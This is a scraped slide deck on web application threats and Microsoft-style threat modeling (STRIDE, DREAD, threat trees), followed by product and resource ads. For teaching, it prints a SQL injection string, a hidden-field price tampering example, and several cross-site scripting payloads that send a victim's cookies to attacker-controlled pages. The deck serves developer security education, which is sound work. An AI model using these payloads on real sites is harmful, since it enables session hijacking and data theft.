440 likes | 760 Views
Threats and Threat Modeling. Murat Gökşin Bakır Microsoft Regional Director Yage Ltd. Session Agenda. Types of threats Threats against the application SQL injection Cross-site scripting Input tampering Session hijacking More Threat modeling. Types of Threats. Network. Host.
E N D
Threats and Threat Modeling Murat Gökşin Bakır Microsoft Regional Director Yage Ltd
Session Agenda • Types of threats • Threats against the application • SQL injection • Cross-site scripting • Input tampering • Session hijacking • More • Threat modeling
Types of Threats Network Host Application Threats against the network Spoofed packets, etc. Buffer overflows, illicit paths, etc. Threats against the host SQL injection, XSS, input tampering, etc. Threats against the application
Threats Against the Network http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh15.asp? frame=true#c15618429_004 i
Threats Against the Host http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh16.asp? frame=true#c16618429_004 i
Threats Against the Application http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh10.asp? frame=true#c10618429_004 i
SQL Injection • Exploits applications that use external input in database commands • Input from <form> fields • Input from query strings • The technique: • Find a <form> field or query string parameter used to generate SQL commands • Submit input that modifies the commands • Compromise, corrupt, and destroy data
How SQL Injection Works Model Query SELECT COUNT (*) FROM Users WHERE UserName=‘Jeff’ AND Password=‘imbatman’ Malicious Query SELECT COUNT (*) FROM Users WHERE UserName=‘’ or 1=1-- AND Password=‘’ "or 1=1" matches every record in the table "--" comments out the remainder of the query
Cross-Site Scripting (XSS) • Exploits applications that echo raw, unfiltered input to Web pages • Input from <form> fields • Input from query strings • The technique: • Find a <form> field or query string parameter whose value is echoed to the Web page • Enter malicious script and get an unwary user to navigate to the infected page • Steal cookies, deface and disable sites
How Cross-Site Scripting Works URL of the site targeted by the attack <a href="http://…/Search.aspx? Search=<script language='javascript'> document.location.replace ('http://localhost/EvilPage.aspx? Cookie=‘ + document.cookie); </script>">…</a> Query string contains embedded JavaScript that redirects to attacker’s page and transmits cookies issued by Search.aspx in a query string
http://www.a.com/hello.asp?name=Blake Hello, <% =Request.QueryString(“name”) %> http://www.b.com/gather.asp If Request.Form(“cookie”) <> “” Then data = Request.Form(“cookie”) ‘ Do whatever I want with the cookie End If Response.Redirect www.microsoft.com The Bad URL http://www.a.com/hello.asp?name= <FORM action=http://www.b.com/gather.asp method=post id=“idForm”> <INPUT name=“cookie” type=“hidden”> </FORM><SCRIPT> idForm.cookie.value=document.cookie; idForm.submit();</SCRIPT> XSS – How it Works
<a href=http://www.contoso.msft/welcome.asp?name= <FORM action=http://www. nwtraders.msft/data.asp method=post id=“idForm”> <INPUT name=“cookie” type=“hidden”> </FORM> <SCRIPT> idForm.cookie.value=document.cookie; idForm.submit(); </SCRIPT> > here </a> Cross-Site Scripting Attacks Based on <form> Tags (2)
Hidden-Field Tampering • HTTP is a stateless protocol • No built-in way to persist data from one request to the next • People are stateful beings • Want data persisted between requests • Shopping carts, user preferences, etc. • Web developers sometimes use hidden fields to persist data between requests • Hidden fields are not really hidden!
How HF Tampering Works type="hidden" prevents the field from being seen on the page but not in View Source Page contains this… <input type=“hidden” name="price" value="$10,000"> Postback data should contain this… price="$10,000" Instead it contains this… price="$1"
Session Hijacking • Web applications use sessions to store state • Sessions are private to individual users • Sessions can be compromised * Shorter session time-outs mitigate the risk by reducing the attack window
Identity Spoofing Security depends on authentication If authentication can be compromised, security goes out the window Authentication can be compromised * Depends on the time-out values assigned to authentication cookies
Information Disclosure Which is the better error message?
Threat Modeling • Structured approach to identifying, quantifying, and addressing threats • Essential part of development process • Just like specing and designing • Just like coding and testing • One technique presented here • There are others (e.g., OCTAVE) i http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh03.asp
The Threat Modeling Process 1 Identify assets 2 Document architecture 3 Decompose application 4 Identify threats 5 Document threats 6 Rate threats
Identifying Assets 1 • What is it that you want to protect? • Private data (e.g., customer list) • Proprietary data (e.g., intellectual property) • Potentially injurious data (e.g., credit card numbers, decryption keys) • These also count as "assets" • Integrity of back-end databases • Integrity of the Web pages (no defacement) • Integrity of other machines on the network • Availability of the application
Documenting Architecture 2 • Define what the app does and how it's used • Users view pages with catalog items • Users perform searches for catalog items • Users add items to shopping carts • Users check out • Diagram the application • Show subsystems • Show data flow • List assets
Example Asset #1 Asset #2 Asset #3 Database Server Web Server Firewall IIS ASP.NET Login Bob Alice Main Bill State Asset #4 Asset #5 Asset #6
Decomposing the App 3 • Refine the architecture diagram • Show authentication mechanisms • Show authorization mechanisms • Show technologies (e.g., DPAPI) • Diagram trust boundaries • Identify entry points • Begin to think like an attacker • Where are my vulnerabilities? • What am I going to do about them?
Example Forms Authentication URL Authorization Database Server Web Server Trust Firewall IIS ASP.NET Login Bob Alice Main Bill State DPAPI Windows Authentication
Identifying Threats 4 • Method #1: Threat lists • Start with laundry list of possible threats • Identify the threats that apply to your app • Method #2: STRIDE • Categorized list of threat types • Identify threats by type/category • Optionally draw threat trees • Root nodes represent attacker's goals • Trees help identify threat conditions
STRIDE Spoofing S Can an attacker gain access using a false identity? Tampering T Can an attacker modify data as it flows through the application? Repudiation R If an attacker denies an exploit, can you prove him or her wrong? Information disclosure I Can an attacker gain access to private or potentially injurious data? Denial of service D Can an attacker crash or reduce the availiability of the system? Elevation of privilege E Can an attacker assume the identity of a privileged user?
Threat Trees Theft of Auth Cookies Obtain auth cookie to spoof identity OR AND AND Unencrypted Connection Eavesdropping Cross-Site Scripting XSS Vulnerability Cookies travel over unencrypted HTTP Attacker uses sniffer to monitor HTTP traffic Attacker possesses means and knowledge Application is vulnerable to XSS attacks
Documenting Threats 5 Document threats using a template
Rating Threats 6 • Simple model • DREAD model • Greater granularization of threat potential • Rates (prioritizes) each threat on scale of 1-15 • Developed and widely used by Microsoft Risk = Probability * Damage Potential 1-10 Scale 1 = Least probable 10 = Most probable 1-10 Scale 1 = Least damage 10 = Most damage
DREAD Damage potential D What are the consequences of a successful exploit? Reproducibility R Would an exploit work every time or only under certain circumstances? Exploitability E How skilled must an attacker be to exploit the vulnerability? Affected users A How many users would be affected by a successful exploit? Discoverability D How likely is it that an attacker will know the vulnerability exists?
Example Potential for damage is high (spoofed identities, etc.) Cookie can be stolen any time, but is only useful until expired Anybody can run a packet sniffer; XSS attacks require moderate skill Prioritized Risks All users could be affected, but in reality most won't click malicious links Easy to discover: just type a <script> block into a field
Additional Resources Sanctum AppScan Developer Edition (DE) Automated unit testing tool that enables rapid development of Secure, Quality Web applications • Integrates directly into Visual Studio .NET • Real-time scanning of potential vulnerabilities • Comprehensive defect analysis of any ASP.NET site • For more product information http://www.sanctuminc.com/solutions/appscande/index.html • For a free product trial http://nct.digitalriver.com/fulfill/0073.1
Microsoft Developer Network http://msdn.microsoft.com/security Patterns and Practices Guides http://www.microsoft.com/patterns
SafeApps™ • Secure Code Assurance (SCA) engine • Replaces a manual security code review. @stake expert code reviewer in a box. • Detects the programming errors that lead to security vulnerabilities. Assists in remediating the errors. • Detects programming errors that lead to viruses and worms • Prioritizes risk of each error from severe error to warning. Optimizes programmer’s time. • Guides the programmer to fix the source of error. Most programmers don’t know how to fix security errors. • Target user • Developer, QA Engineer, Security Engineer • Development teams that use SafeApps can drastically reduce the number of vulnerabilities in their software.
Resources/Next Steps • NGSCB is part of the Longhorn SDK • Ask your hardware and software vendors what NGSCB-enabled components they will provide • Visit our site and read the white papers and specs • http://www.microsoft.com/ngscb • Send questions to our Q&A alias • ngscb_qa@microsoft.com • Sign up for e-mail updates • Subscribe to the NGSCB information newsletter for ongoing updates. Send blank e-mail to: • wtpiinfo-subscribe@pens.tm500.com
Now available for PDC bits 13 Chapters, 470 Pages Topics Covered Introduction, Tools & Architecture, Data Source Controls and Data Binding, GridView & DetailsView Controls, Master Pages & Navigation, Security, Personalization & Themes, Web Parts, Mobile Device Support, SQL Cache Invalidation, Precompilation, Confuguration & Administration and more. ASP.NET Whidbey Book Purchase and review at: http://www.asp.net/whidbey
Integer Arithmetic Vulns • Once rare, now common • Sun RPC xdr_array (http://www.securityfocus.com/bid/5356) • OpenSSH authentication (http://www.securityfocus.com/bid/5093) • Apache Chunked Encoding(http://www.securityfocus.com/bid/5033) • Microsoft JScript (http://www.microsoft.com/technet/security/bulletin/MS03-008.asp) • FreeBSD socket and system calls (http://www.securityfocus.com/bid/5493) • Snort TCP Packet Reassembly(http://www.securityfocus.com/bid/7178) • Microsoft MIDI Decoder (http://www.microsoft.com/technet/security/bulletin/MS03-030.asp) • OpenSSL ASN.1 Parsing (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0543)
© 2003-2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.